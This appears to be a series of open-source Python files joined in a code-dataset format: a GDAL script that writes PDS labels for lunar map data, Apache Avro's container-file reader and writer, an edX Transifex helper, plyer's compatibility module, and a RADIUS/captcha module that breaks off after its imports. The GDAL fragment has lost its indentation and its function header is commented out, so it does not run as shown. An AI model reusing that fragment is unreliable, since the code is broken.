else:
print( " NoData Value=%.18g" % dfNoData )
if hBand.GetOverviewCount() > 0:
line = " Overviews: "
for iOverview in range(hBand.GetOverviewCount()):
if iOverview != 0 :
line = line + ", "
hOverview = hBand.GetOverview( iOverview );
if hOverview is not None:
line = line + ( "%dx%d" % (hOverview.XSize, hOverview.YSize))
pszResampling = \
hOverview.GetMetadataItem( "RESAMPLING", "" )
if pszResampling is not None \
and len(pszResampling) >= 12 \
and EQUAL(pszResampling[0:12],"AVERAGE_BIT2"):
line = line + "*"
else:
line = line + "(null)"
print(line)
if bComputeChecksum:
line = " Overviews checksum: "
for iOverview in range(hBand.GetOverviewCount()):
if iOverview != 0:
line = line + ", "
hOverview = hBand.GetOverview( iOverview );
if hOverview is not None:
line = line + ( "%d" % hOverview.Checksum())
else:
line = line + "(null)"
print(line)
if hBand.HasArbitraryOverviews():
print( " Overviews: arbitrary" )
nMaskFlags = hBand.GetMaskFlags()
if (nMaskFlags & (gdal.GMF_NODATA|gdal.GMF_ALL_VALID)) == 0:
hMaskBand = hBand.GetMaskBand()
line = " Mask Flags: "
if (nMaskFlags & gdal.GMF_PER_DATASET) != 0:
line = line + "PER_DATASET "
if (nMaskFlags & gdal.GMF_ALPHA) != 0:
line = line + "ALPHA "
if (nMaskFlags & gdal.GMF_NODATA) != 0:
line = line + "NODATA "
if (nMaskFlags & gdal.GMF_ALL_VALID) != 0:
line = line + "ALL_VALID "
print(line)
if hMaskBand is not None and \
hMaskBand.GetOverviewCount() > 0:
line = " Overviews of mask band: "
for iOverview in range(hMaskBand.GetOverviewCount()):
if iOverview != 0:
line = line + ", "
hOverview = hMaskBand.GetOverview( iOverview );
if hOverview is not None:
line = line + ( "%d" % hOverview.Checksum())
else:
line = line + "(null)"
if len(hBand.GetUnitType()) > 0:
print( " Unit Type: %s" % hBand.GetUnitType())
papszCategories = hBand.GetRasterCategoryNames()
if papszCategories is not None:
print( " Categories:" );
i = 0
for category in papszCategories:
print( " %3d: %s" % (i, category) )
i = i + 1
if hBand.GetScale() != 1.0 or hBand.GetOffset() != 0.0:
print( " Offset: %.15g, Scale:%.15g" % \
( hBand.GetOffset(), hBand.GetScale()))
if bShowMetadata:
papszMetadata = hBand.GetMetadata_List()
else:
papszMetadata = None
if bShowMetadata and papszMetadata is not None and len(papszMetadata) > 0 :
print( " Metadata:" )
for metadata in papszMetadata:
print( " %s" % metadata )
if bShowMetadata:
papszMetadata = hBand.GetMetadata_List("IMAGE_STRUCTURE")
else:
papszMetadata = None
if bShowMetadata and papszMetadata is not None and len(papszMetadata) > 0 :
print( " Image Structure Metadata:" )
for metadata in papszMetadata:
print( " %s" % metadata )
hTable = hBand.GetRasterColorTable()
if hBand.GetRasterColorInterpretation() == gdal.GCI_PaletteIndex \
and hTable is not None:
print( " Color Table (%s with %d entries)" % (\
gdal.GetPaletteInterpretationName( \
hTable.GetPaletteInterpretation( )), \
hTable.GetCount() ))
if bShowColorTable:
for i in range(hTable.GetCount()):
sEntry = hTable.GetColorEntry(i)
print( " %3d: %d,%d,%d,%d" % ( \
i, \
sEntry[0],\
sEntry[1],\
sEntry[2],\
sEntry[3] ))
if bShowRAT:
hRAT = hBand.GetDefaultRAT()
#GDALRATDumpReadable( hRAT, None );
#/************************************************************************/
#/* WritePDSlabel() */
#/************************************************************************/
#def WritePDSlabel(outFile, DataSetID, pszFilename, sampleBits, lines, samples):
instrList = pszFilename.split("_")
hBand = hDataset.GetRasterBand( 1 )
#get the datatype
if EQUAL(gdal.GetDataTypeName(hBand.DataType), "Float32"):
sample_bits = 32
sample_type = "PC_REAL"
sample_mask = "2#11111111111111111111111111111111#"
elif EQUAL(gdal.GetDataTypeName(hBand.DataType), "INT16"):
sample_bits = 16
sample_type = "LSB_INTEGER"
sample_mask = "2#1111111111111111#"
elif EQUAL(gdal.GetDataTypeName(hBand.DataType), "UINT16"):
sample_bits = 16
sample_type = "UNSIGNED_INTEGER"
sample_mask = "2#1111111111111111#"
elif EQUAL(gdal.GetDataTypeName(hBand.DataType), "Byte"):
sample_bits = 8
sample_type = "UNSIGNED_INTEGER"
sample_mask = "2#11111111#"
else:
print( " %s: Not supported pixel type" % gdal.GetDataTypeName(hBand.DataType))
sys.exit(1)
f.write('PDS_VERSION_ID = PDS3\n')
f.write('\n')
f.write('/* The source image data definition. */\n')
f.write('FILE_NAME = \"%s\"\n' % (dst_img))
f.write('RECORD_TYPE = FIXED_LENGTH\n')
f.write('RECORD_BYTES = %d\n' % (hDataset.RasterYSize))
f.write('FILE_RECORDS = %d\n' % ((hDataset.RasterXSize * sample_bits / 8)) )
#f.write('LABEL_RECORDS = 1\n')
f.write('^IMAGE = \"%s\"\n' % (dst_img))
f.write('\n')
f.write('/* Identification Information */\n')
f.write('DATA_SET_ID = "%s"\n' % pszFilename.split(".")[0])
f.write('DATA_SET_NAME = "%s"\n' % pszFilename.split(".")[0])
f.write('PRODUCER_INSTITUTION_NAME = "Lunar Mapping and Modeling Project"\n')
f.write('PRODUCER_ID = "LMMP_TEAM"\n')
f.write('PRODUCER_FULL_NAME = "LMMP TEAM"\n')
f.write('PRODUCT_ID = "%s"\n' % pszFilename.split(".")[0])
if "_v" in pszFilename:
f.write('PRODUCT_VERSION_ID = "%s.0"\n' % instrList[-1].split(".")[0].upper())
else:
f.write('PRODUCT_VERSION_ID = "%s"\n' % "V1.0")
f.write('PRODUCT_TYPE = "RDR"\n')
if len(instrList) > 1:
f.write('INSTRUMENT_HOST_NAME = "%s"\n' % instrList[0])
f.write('INSTRUMENT_HOST_ID = "%s"\n' % instrList[0])
f.write('INSTRUMENT_NAME = "%s"\n' % instrList[1])
f.write('INSTRUMENT_ID = "%s"\n' % instrList[1])
f.write('TARGET_NAME = MOON\n')
f.write('MISSION_PHASE_NAME = "POST MISSION"\n')
f.write('RATIONALE_DESC = "Created at the request of NASA\'s Exploration\n')
f.write(' Systems Mission Directorate to support future\n')
f.write(' human exploration"\n')
f.write('SOFTWARE_NAME = "ISIS 3.2.1 | SOCET SET v5.5 (r) BAE Systems\n')
f.write(' | GDAL 1.8"\n')
f.write('\n')
f.write('/* Time Parameters */\n')
f.write('START_TIME = "N/A"\n')
f.write('STOP_TIME = "N/A"\n')
f.write('SPACECRAFT_CLOCK_START_COUNT = "N/A"\n')
f.write('SPACECRAFT_CLOCK_STOP_COUNT = "N/A"\n')
f.write('PRODUCT_CREATION_TIME = %s\n' % strftime("%Y-%m-%dT%H:%M:%S")) #2011-03-11T22:13:40
f.write('\n')
f.write('OBJECT = IMAGE_MAP_PROJECTION\n')
f.write(' ^DATA_SET_MAP_PROJECTION = "DSMAP.CAT"\n')
f.write(' MAP_PROJECTION_TYPE = \"%s\"\n' % mapProjection)
f.write(' PROJECTION_LATITUDE_TYPE = PLANETOCENTRIC\n')
f.write(' A_AXIS_RADIUS = %.1f <KM>\n' % semiMajor)
f.write(' B_AXIS_RADIUS = %.1f <KM>\n' % semiMajor)
f.write(' C_AXIS_RADIUS = %.1f <KM>\n' % semiMinor)
f.write(' COORDINATE_SYSTEM_NAME = PLANETOCENTRIC\n')
f.write(' POSITIVE_LONGITUDE_DIRECTION = EAST\n')
f.write(' KEYWORD_LATITUDE_TYPE = PLANETOCENTRIC\n')
f.write(' /* NOTE: CENTER_LATITUDE and CENTER_LONGITUDE describe the location */\n')
f.write(' /* of the center of projection, which is not necessarily equal to the */\n')
f.write(' /* location of the center point of the image. */\n')
if (centLat != None):
f.write(' CENTER_LATITUDE = %5.2f <DEG>\n' % centLat)
if (centLon != None):
f.write(' CENTER_LONGITUDE = %5.2f <DEG>\n' % centLon)
f.write(' LINE_FIRST_PIXEL = 1\n')
f.write(' LINE_LAST_PIXEL = %d\n' % hDataset.RasterYSize)
f.write(' SAMPLE_FIRST_PIXEL = 1\n')
f.write(' SAMPLE_LAST_PIXEL = %d\n' % hDataset.RasterXSize)
f.write(' MAP_PROJECTION_ROTATION = 0.0 <DEG>\n')
f.write(' MAP_RESOLUTION = %.4f <PIX/DEG>\n' % mapres )
f.write(' MAP_SCALE = %.8f <KM/PIXEL>\n' % kmres )
f.write(' MINIMUM_LATITUDE = %.8f <DEGREE>\n' % lry)
f.write(' MAXIMUM_LATITUDE = %.8f <DEGREE>\n' % uly)
f.write(' WESTERNMOST_LONGITUDE = %.8f <DEGREE>\n' % ulx)
f.write(' EASTERNMOST_LONGITUDE = %.8f <DEGREE>\n' % lrx)
f.write(' LINE_PROJECTION_OFFSET = %.1f\n' % ( (ulx / kmres * 1000 ) - 0.5 ))
f.write(' SAMPLE_PROJECTION_OFFSET = %.1f\n' % ( (uly / kmres * 1000 ) + 0.5 ))
f.write('END_OBJECT = IMAGE_MAP_PROJECTION\n')
f.write('\n')
f.write('OBJECT = IMAGE\n')
f.write(' NAME = \"%s\"\n' % (pszFilename))
f.write(' DESCRIPTION = "Export data set from LMMP portal.\n')
f.write(' see filename for data type."\n')
#f.write('\n')
f.write(' LINES = %d\n' % hDataset.RasterYSize)
f.write(' LINE_SAMPLES = %d\n' % hDataset.RasterXSize)
f.write(' UNIT = METER\n')
f.write(' OFFSET = %.10g\n' % ( hBand.GetOffset() ))
f.write(' SCALING_FACTOR = %.10g\n' % ( hBand.GetScale() ))
f.write(' SAMPLE_TYPE = %s\n' % (sample_type) )
f.write(' SAMPLE_BITS = %d\n' % (sample_bits) )
f.write(' SAMPLE_BIT_MASK = %s\n' % (sample_mask) )
#f.write('\n')
f.write(' BANDS = %d\n' % hDataset.RasterCount)
#f.write('\n')
f.write(' BAND_STORAGE_TYPE = BAND_SEQUENTIAL\n')
if (sample_bits == 32) :
f.write(' CORE_NULL = 16#FF7FFFFB#\n')
f.write(' CORE_LOW_REPR_SATURATION = 16#FF7FFFFC#\n')
f.write(' CORE_LOW_INSTR_SATURATION = 16#FF7FFFFD#\n')
f.write(' CORE_HIGH_REPR_SATURATION = 16#FF7FFFFF#\n')
f.write(' CORE_HIGH_INSTR_SATURATION = 16#FF7FFFFE#\n')
elif (sample_bits == 16) :
f.write(' CORE_NULL = -32768\n')
f.write(' CORE_LOW_REPR_SATURATION = -32767\n')
f.write(' CORE_LOW_INSTR_SATURATION = -32766\n')
f.write(' CORE_HIGH_REPR_SATURATION = 32767\n')
f.write(' CORE_HIGH_INSTR_SATURATION = 32768\n')
else : #8bit
f.write(' CORE_NULL = 0\n')
f.write(' CORE_LOW_REPR_SATURATION = 0\n')
f.write(' CORE_LOW_INSTR_SATURATION = 0\n')
f.write(' CORE_HIGH_REPR_SATURATION = 255\n')
f.write(' CORE_HIGH_INSTR_SATURATION = 255\n')
f.write('END_OBJECT = IMAGE\n')
f.write('END\n')
f.close()
#########################
#Export out raw image
#########################
#Setup the output dataset
print ('Please wait, writing out raw image: %s' % dst_img)
driver = gdal.GetDriverByName('ENVI')
output = driver.CreateCopy(dst_img, hDataset, 1)
print ('Complete. PDS label also created: %s' % dst_lbl)
return 0
#/************************************************************************/
#/* GDALInfoReportCorner() */
#/************************************************************************/
def GDALInfoReportCorner( hDataset, hTransform, corner_name, x, y ):
    """Print one corner of the dataset, georeferenced when possible.

    Prints the pixel/line position (when no geotransform exists) or the
    georeferenced position, optionally followed by lat/long in DMS form
    when a coordinate transform is supplied.  Returns True when the
    dataset is georeferenced, False otherwise.
    """
    label = "%-11s " % corner_name

    # Transform the pixel/line position into georeferenced coordinates.
    gt = hDataset.GetGeoTransform(can_return_null=True)
    if gt is None:
        # No geotransform: report the raw pixel/line position only.
        print(label + ("(%7.1f,%7.1f)" % (x, y)))
        return False

    geo_x = gt[0] + gt[1] * x + gt[2] * y
    geo_y = gt[3] + gt[4] * x + gt[5] * y

    # Report the georeferenced coordinates; use more decimals when the
    # values look like degrees rather than projected meters.
    looks_like_degrees = abs(geo_x) < 181 and abs(geo_y) < 91
    if looks_like_degrees:
        label += "(%12.7f,%12.7f) " % (geo_x, geo_y)
    else:
        label += "(%12.3f,%12.3f) " % (geo_x, geo_y)

    # Transform to lat/long and report in degrees/minutes/seconds.
    if hTransform is not None:
        pnt = hTransform.TransformPoint(geo_x, geo_y, 0)
        if pnt is not None:
            label += "(%s," % gdal.DecToDMS(pnt[0], "Long", 2)
            label += "%s)" % gdal.DecToDMS(pnt[1], "Lat", 2)

    print(label)
    return True
#/************************************************************************/
#/* GDALGetLon() */
#/************************************************************************/
def GDALGetLon( hDataset, hTransform, x, y ):
    """Return the longitude of pixel/line position (x, y).

    Applies the dataset geotransform, then the optional coordinate
    transform.  Returns 0.0 when the dataset has no geotransform, the
    transformed longitude when hTransform yields a point, and the raw
    georeferenced X otherwise.
    """
    gt = hDataset.GetGeoTransform(can_return_null=True)
    if gt is None:
        # Not georeferenced; no meaningful longitude.
        return 0.0

    # Pixel/line -> georeferenced coordinates.
    geo_x = gt[0] + gt[1] * x + gt[2] * y
    geo_y = gt[3] + gt[4] * x + gt[5] * y

    # Reproject to lat/long when a transform is available.
    if hTransform is not None:
        pnt = hTransform.TransformPoint(geo_x, geo_y, 0)
        if pnt is not None:
            return pnt[0]
    return geo_x
#/************************************************************************/
#/* GDALGetLat() */
#/************************************************************************/
def GDALGetLat( hDataset, hTransform, x, y ):
    """Return the latitude of pixel/line position (x, y).

    Applies the dataset geotransform, then the optional coordinate
    transform.  Returns 0.0 when the dataset has no geotransform, the
    transformed latitude when hTransform yields a point, and the raw
    georeferenced Y otherwise.
    """
    gt = hDataset.GetGeoTransform(can_return_null=True)
    if gt is None:
        # Not georeferenced; no meaningful latitude.
        return 0.0

    # Pixel/line -> georeferenced coordinates.
    geo_x = gt[0] + gt[1] * x + gt[2] * y
    geo_y = gt[3] + gt[4] * x + gt[5] * y

    # Reproject to lat/long when a transform is available.
    if hTransform is not None:
        pnt = hTransform.TransformPoint(geo_x, geo_y, 0)
        if pnt is not None:
            return pnt[1]
    return geo_y
if __name__ == '__main__':
    # GetGeoTransform(can_return_null=...) first appeared in the GDAL 1.8.0
    # Python bindings, so refuse to run against anything older.
    version_num = int(gdal.VersionInfo('VERSION_NUM'))
    if version_num < 1800: # because of GetGeoTransform(can_return_null)
        print('ERROR: Python bindings of GDAL 1.8.0 or later required')
        sys.exit(1)
    sys.exit(main(sys.argv))
| USGS-Astrogeology/GDAL_scripts | gdal2ISIS3/LMMP_gdal2PDS.py | Python | unlicense | 40,880 |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Read/Write Avro File Object Containers.
"""
from six import BytesIO
import six
import zlib
from avro import schema
from avro import io
try:
import snappy
has_snappy = True
except ImportError:
has_snappy = False
#
# Constants
#
# Container-file format version embedded in the magic bytes.
VERSION = 1
# Every Avro object container file starts with 'Obj' followed by the version.
MAGIC = b'Obj' + six.int2byte(VERSION)
MAGIC_SIZE = len(MAGIC)
# A 16-byte random sync marker separates data blocks.
SYNC_SIZE = 16
SYNC_INTERVAL = 4000 * SYNC_SIZE # TODO(hammer): make configurable
# Schema describing the container-file header (magic, metadata map, sync).
META_SCHEMA = schema.parse("""\
{"type": "record", "name": "org.apache.avro.file.Header",
 "fields" : [
   {"name": "magic", "type": {"type": "fixed", "name": "magic", "size": %d}},
   {"name": "meta", "type": {"type": "map", "values": "bytes"}},
   {"name": "sync", "type": {"type": "fixed", "name": "sync", "size": %d}}]}
""" % (MAGIC_SIZE, SYNC_SIZE))
# Block-compression codecs; 'snappy' only when python-snappy is importable.
VALID_CODECS = ['null', 'deflate']
if has_snappy:
  VALID_CODECS.append('snappy')
VALID_ENCODINGS = ['binary'] # not used yet
# Reserved metadata keys for codec name and writer's schema.
CODEC_KEY = "avro.codec"
SCHEMA_KEY = "avro.schema"
#
# Exceptions
#
class DataFileException(schema.AvroException):
  """
  Raised when there's a problem reading or writing file object containers.
  """
  def __init__(self, fail_msg):
    # fail_msg: human-readable description of the container-file problem.
    schema.AvroException.__init__(self, fail_msg)
#
# Write Path
#
class DataFileWriter(object):
  """Write Avro object container files.

  The file layout is: header (magic, metadata, sync marker) followed by
  data blocks.  Data is accumulated in an in-memory buffer and flushed as
  a block (optionally compressed) once SYNC_INTERVAL bytes are buffered,
  each block terminated by the file's 16-byte sync marker.
  """

  @staticmethod
  def generate_sync_marker():
    # Random marker lets readers detect/skip to block boundaries.
    return generate_sixteen_random_bytes()

  # TODO(hammer): make 'encoder' a metadata property
  def __init__(self, writer, datum_writer, writers_schema=None, codec='null'):
    """
    If the schema is not present, presume we're appending.

    @param writer: File-like object to write into.
    @param datum_writer: io.DatumWriter used to serialize each datum.
    @param writers_schema: Schema for a new file; None means append to an
        existing container already present in `writer`.
    @param codec: Block-compression codec name; must be in VALID_CODECS.
    @raise DataFileException: if the codec is unknown.
    """
    self._writer = writer
    self._encoder = io.BinaryEncoder(writer)
    self._datum_writer = datum_writer
    # Per-block staging buffer; flushed by _write_block().
    self._buffer_writer = BytesIO()
    self._buffer_encoder = io.BinaryEncoder(self._buffer_writer)
    self._block_count = 0
    self._meta = {}
    # Header is written lazily, on the first block flush.
    self._header_written = False
    if writers_schema is not None:
      # Creating a fresh container file.
      if codec not in VALID_CODECS:
        raise DataFileException("Unknown codec: %r" % codec)
      self._sync_marker = DataFileWriter.generate_sync_marker()
      self.set_meta('avro.codec', codec)
      self.set_meta('avro.schema', str(writers_schema))
      self.datum_writer.writers_schema = writers_schema
    else:
      # Appending: open writer for reading to collect existing metadata.
      dfr = DataFileReader(writer, io.DatumReader())
      # TODO(hammer): collect arbitrary metadata
      # Reuse the existing sync marker and codec so new blocks match.
      self._sync_marker = dfr.sync_marker
      self.set_meta('avro.codec', dfr.get_meta('avro.codec'))
      # get schema used to write existing file
      schema_from_file = dfr.get_meta('avro.schema')
      self.set_meta('avro.schema', schema_from_file)
      self.datum_writer.writers_schema = schema.parse(schema_from_file)
      # seek to the end of the file and prepare for writing
      writer.seek(0, 2)
      self._header_written = True

  # read-only properties
  writer = property(lambda self: self._writer)
  encoder = property(lambda self: self._encoder)
  datum_writer = property(lambda self: self._datum_writer)
  buffer_writer = property(lambda self: self._buffer_writer)
  buffer_encoder = property(lambda self: self._buffer_encoder)
  sync_marker = property(lambda self: self._sync_marker)
  meta = property(lambda self: self._meta)

  def __enter__(self):
    return self

  def __exit__(self, type, value, traceback):
    # Perform a close if there's no exception
    # NOTE(review): on an exception the file is left open; presumably
    # intentional so a partial write is not flushed -- confirm.
    if type is None:
      self.close()

  # read/write properties
  def set_block_count(self, new_val):
    self._block_count = new_val
  block_count = property(lambda self: self._block_count, set_block_count)

  # utility functions to read/write metadata entries
  def get_meta(self, key):
    return self._meta.get(key)

  def set_meta(self, key, val):
    self._meta[key] = val

  def _write_header(self):
    # Header record: magic bytes, metadata map, and the sync marker.
    header = {'magic': MAGIC,
              'meta': self.meta,
              'sync': self.sync_marker}
    self.datum_writer.write_data(META_SCHEMA, header, self.encoder)
    self._header_written = True

  # TODO(hammer): make a schema for blocks and use datum_writer
  def _write_block(self):
    # Flush the buffered data as one (possibly compressed) block.
    if not self._header_written:
      self._write_header()
    if self.block_count > 0:
      # write number of items in block
      self.encoder.write_long(self.block_count)
      # write block contents
      uncompressed_data = self.buffer_writer.getvalue()
      if self.get_meta(CODEC_KEY) == 'null':
        compressed_data = uncompressed_data
        compressed_data_length = len(compressed_data)
      elif self.get_meta(CODEC_KEY) == 'deflate':
        # The first two characters and last character are zlib
        # wrappers around deflate data.
        compressed_data = zlib.compress(uncompressed_data)[2:-1]
        compressed_data_length = len(compressed_data)
      elif self.get_meta(CODEC_KEY) == 'snappy':
        compressed_data = snappy.compress(uncompressed_data)
        compressed_data_length = len(compressed_data) + 4 # crc32
      else:
        fail_msg = '"%s" codec is not supported.' % self.get_meta(CODEC_KEY)
        raise DataFileException(fail_msg)
      # Write length of block
      self.encoder.write_long(compressed_data_length)
      # Write block
      self.writer.write(compressed_data)
      # Write CRC32 checksum for Snappy
      if self.get_meta(CODEC_KEY) == 'snappy':
        self.encoder.write_crc32(uncompressed_data)
      # write sync marker
      self.writer.write(self.sync_marker)
      # reset buffer
      self.buffer_writer.truncate(0)
      self.buffer_writer.seek(0) # py3: truncate no longer changes file position
      self.block_count = 0

  def append(self, datum):
    """Append a datum to the file."""
    self.datum_writer.write(datum, self.buffer_encoder)
    self.block_count += 1
    # if the data to write is larger than the sync interval, write the block
    if self.buffer_writer.tell() >= SYNC_INTERVAL:
      self._write_block()

  def sync(self):
    """
    Return the current position as a value that may be passed to
    DataFileReader.seek(long). Forces the end of the current block,
    emitting a synchronization marker.
    """
    self._write_block()
    return self.writer.tell()

  def flush(self):
    """Flush the current state of the file, including metadata."""
    self._write_block()
    self.writer.flush()

  def close(self):
    """Close the file."""
    self.flush()
    self.writer.close()
class DataFileReader(six.Iterator):
  """Read files written by DataFileWriter.

  Iterating the reader yields one deserialized datum at a time, decoding
  blocks lazily and skipping the sync markers between them.
  """
  # TODO(hammer): allow user to specify expected schema?
  # TODO(hammer): allow user to specify the encoder

  def __init__(self, reader, datum_reader):
    """
    @param reader: Seekable file-like object containing the container file.
    @param datum_reader: io.DatumReader used to deserialize each datum.
    @raise DataFileException: if the file's codec is unknown.
    @raise schema.AvroException: if the magic bytes do not match.
    """
    self._reader = reader
    self._raw_decoder = io.BinaryDecoder(reader)
    self._datum_decoder = None # Maybe reset at every block.
    self._datum_reader = datum_reader
    # read the header: magic, meta, sync
    self._read_header()
    # ensure codec is valid; a missing codec entry means uncompressed
    self.codec = self.get_meta('avro.codec')
    if self.codec is None:
      self.codec = "null"
    if self.codec not in VALID_CODECS:
      raise DataFileException('Unknown codec: %s.' % self.codec)
    # get file length
    self._file_length = self.determine_file_length()
    # get ready to read
    self._block_count = 0
    self.datum_reader.writers_schema = schema.parse(self.get_meta(SCHEMA_KEY))

  def __enter__(self):
    return self

  def __exit__(self, type, value, traceback):
    # Perform a close if there's no exception
    if type is None:
      self.close()

  def __iter__(self):
    return self

  # read-only properties
  reader = property(lambda self: self._reader)
  raw_decoder = property(lambda self: self._raw_decoder)
  datum_decoder = property(lambda self: self._datum_decoder)
  datum_reader = property(lambda self: self._datum_reader)
  sync_marker = property(lambda self: self._sync_marker)
  meta = property(lambda self: self._meta)
  file_length = property(lambda self: self._file_length)

  # read/write properties
  def set_block_count(self, new_val):
    self._block_count = new_val
  block_count = property(lambda self: self._block_count, set_block_count)

  # utility functions to read/write metadata entries
  def get_meta(self, key):
    return self._meta.get(key)

  def set_meta(self, key, val):
    self._meta[key] = val

  def determine_file_length(self):
    """
    Get file length and leave file cursor where we found it.
    """
    remember_pos = self.reader.tell()
    self.reader.seek(0, 2)
    file_length = self.reader.tell()
    self.reader.seek(remember_pos)
    return file_length

  def is_EOF(self):
    # True once the cursor has reached the end of the container file.
    return self.reader.tell() == self.file_length

  def _read_header(self):
    # seek to the beginning of the file to get magic block
    self.reader.seek(0, 0)
    # read header into a dict
    header = self.datum_reader.read_data(
      META_SCHEMA, META_SCHEMA, self.raw_decoder)
    # check magic number
    if header.get('magic') != MAGIC:
      fail_msg = "Not an Avro data file: %s doesn't match %s."\
                 % (header.get('magic'), MAGIC)
      raise schema.AvroException(fail_msg)
    # set metadata; on py3 metadata values arrive as bytes and are decoded
    self._meta = header['meta']
    if six.PY3:
      for key, value in self._meta.items():
        self._meta[key] = value.decode('US-ASCII')
    # set sync marker
    self._sync_marker = header['sync']

  def _read_block_header(self):
    # A block header is: datum count, then byte length, then the data.
    self.block_count = self.raw_decoder.read_long()
    if self.codec == "null":
      # Skip a long; we don't need to use the length.
      self.raw_decoder.skip_long()
      self._datum_decoder = self._raw_decoder
    elif self.codec == 'deflate':
      # Compressed data is stored as (length, data), which
      # corresponds to how the "bytes" type is encoded.
      data = self.raw_decoder.read_bytes()
      # -15 is the log of the window size; negative indicates
      # "raw" (no zlib headers) decompression.  See zlib.h.
      uncompressed = zlib.decompress(data, -15)
      self._datum_decoder = io.BinaryDecoder(BytesIO(uncompressed))
    elif self.codec == 'snappy':
      # Compressed data includes a 4-byte CRC32 checksum
      length = self.raw_decoder.read_long()
      data = self.raw_decoder.read(length - 4)
      uncompressed = snappy.decompress(data)
      self._datum_decoder = io.BinaryDecoder(BytesIO(uncompressed))
      self.raw_decoder.check_crc32(uncompressed);
    else:
      raise DataFileException("Unknown codec: %r" % self.codec)

  def _skip_sync(self):
    """
    Read the length of the sync marker; if it matches the sync marker,
    return True. Otherwise, seek back to where we started and return False.
    """
    proposed_sync_marker = self.reader.read(SYNC_SIZE)
    if proposed_sync_marker != self.sync_marker:
      self.reader.seek(-SYNC_SIZE, 1)
      return False
    else:
      return True

  # TODO(hammer): handle block of length zero
  # TODO(hammer): clean this up with recursion
  def __next__(self):
    """Return the next datum in the file."""
    if self.block_count == 0:
      # Current block is exhausted: skip the sync marker (if present)
      # and read the next block header, or stop at end of file.
      if self.is_EOF():
        raise StopIteration
      elif self._skip_sync():
        if self.is_EOF(): raise StopIteration
        self._read_block_header()
      else:
        self._read_block_header()
    datum = self.datum_reader.read(self.datum_decoder)
    self.block_count -= 1
    return datum

  def close(self):
    """Close this reader."""
    self.reader.close()
def generate_sixteen_random_bytes():
  """Return 16 random bytes, used as a data file's sync marker.

  Prefers os.urandom, which is available on all mainstream platforms and
  raises NotImplementedError only where the OS offers no randomness
  source; only in that case fall back to the random module.  The previous
  bare `except:` also swallowed unrelated errors (including
  KeyboardInterrupt/SystemExit), silently degrading marker quality.
  """
  try:
    import os
    return os.urandom(16)
  except NotImplementedError:
    import random
    return bytearray([random.randrange(256) for i in range(16)])
| Yelp/avro | lang/py/src/avro/datafile.py | Python | apache-2.0 | 12,300 |
#!/usr/bin/env python
import os, sys
from polib import pofile
from config import CONFIGURATION
from extract import SOURCE_WARN
from execute import execute
# Attribution line written into pulled .po headers; %s is filled with the
# translating team (when known) or the Transifex project URL below.
TRANSIFEX_HEADER = 'Translations in this file have been downloaded from %s'
TRANSIFEX_URL = 'https://www.transifex.com/projects/p/edx-studio/'
def push():
    """Push the source-language translation files (.po) up to Transifex."""
    execute('tx push -s')
def pull():
    """Pull translated .po files from Transifex for every non-source
    locale, then strip the English-source warning from all of them."""
    for locale in CONFIGURATION.locales:
        if locale != CONFIGURATION.source_locale:
            execute('tx pull -l %s' % locale)
    clean_translated_locales()
def clean_translated_locales():
    """
    Remove the English-source warning from the .po files of every
    translated (non-source) locale.
    """
    for locale in CONFIGURATION.locales:
        if locale == CONFIGURATION.source_locale:
            continue
        clean_locale(locale)
def clean_locale(locale):
    """
    Remove the English-source warning from each of one locale's
    machine-generated .po files.
    """
    messages_dir = CONFIGURATION.get_messages_dir(locale)
    for po_name in ('django-partial.po', 'djangojs.po', 'mako.po'):
        clean_file(messages_dir.joinpath(po_name))
def clean_file(file):
    """
    Replace the English-source warning in one translated .po file's
    header with a note crediting Transifex, then save the file.
    Files whose header lacks the warning are left untouched.
    """
    po = pofile(file)
    if SOURCE_WARN in po.header:
        po.header = po.header.replace(SOURCE_WARN, get_new_header(po))
        po.save()
def get_new_header(po):
    """Return the Transifex attribution line, crediting the file's
    Language-Team when one is recorded, else the project URL."""
    team = po.metadata.get('Language-Team')
    return TRANSIFEX_HEADER % (team or TRANSIFEX_URL)
if __name__ == '__main__':
    # Minimal CLI: `transifex.py push` uploads sources,
    # `transifex.py pull` downloads and cleans translations.
    if len(sys.argv) < 2:
        raise Exception("missing argument: push or pull")
    arg = sys.argv[1]
    if arg == 'push':
        push()
    elif arg == 'pull':
        pull()
    else:
        raise Exception("unknown argument: (%s)" % arg)
| abdoosh00/edx-rtl-final | i18n/transifex.py | Python | agpl-3.0 | 2,013 |
'''
Compatibility module for Python 2.7 and > 3.3
=============================================
'''
# pylint: disable=invalid-name
__all__ = ('PY2', 'string_types', 'queue', 'iterkeys',
'itervalues', 'iteritems', 'xrange')
import sys
try:
import queue
except ImportError:
import Queue as queue
#: True if a Python 2 interpreter is used
PY2 = sys.version_info[0] == 2
#: String types that can be used for checking if an object is a string
string_types = None
text_type = None
if PY2:
    # pylint: disable=undefined-variable
    # `basestring`/`unicode` are built-ins on Python 2 only, so they are
    # defined in globals() for py2 (pylint cannot see them).
    string_types = basestring
    text_type = unicode
else:
    # Python 3 has a single (unicode) string type.
    string_types = text_type = str
# Lazy dict-iteration helpers: Python 2 has dedicated iter* methods,
# while Python 3's keys()/values()/items() already return views.
if PY2:
    iterkeys = lambda d: d.iterkeys()
    itervalues = lambda d: d.itervalues()
    iteritems = lambda d: d.iteritems()
else:
    iterkeys = lambda d: iter(d.keys())
    itervalues = lambda d: iter(d.values())
    iteritems = lambda d: iter(d.items())
# Lazy integer range: xrange on Python 2, the built-in range on Python 3.
if PY2:
    # pylint: disable=undefined-variable
    # built-in actually, so it is defined in globals() for py2
    xrange = xrange
else:
    xrange = range
| KeyWeeUsr/plyer | plyer/compat.py | Python | mit | 1,120 |
#coding=utf-8
import os
import sys
sys.path.append(sys.path[0] + "/lib/")
from werkzeug.contrib.fixers import ProxyFix
import packet
from client import Client
from dictionary import Dictionary
import mschap2
from socket import gethostname
from time import time
import random
from PIL import Image, ImageDraw, ImageFont, ImageFilter
import StringIO
# CAPTCHA character pool: lowercase letters minus easily-confused glyphs,
# their uppercase forms, and the digits 3-9 (0/1/2 excluded as confusable).
# NOTE(review): these four names are re-assigned further down this module
# (just before FONT_FILE_PATH) with a different alphabet; since default
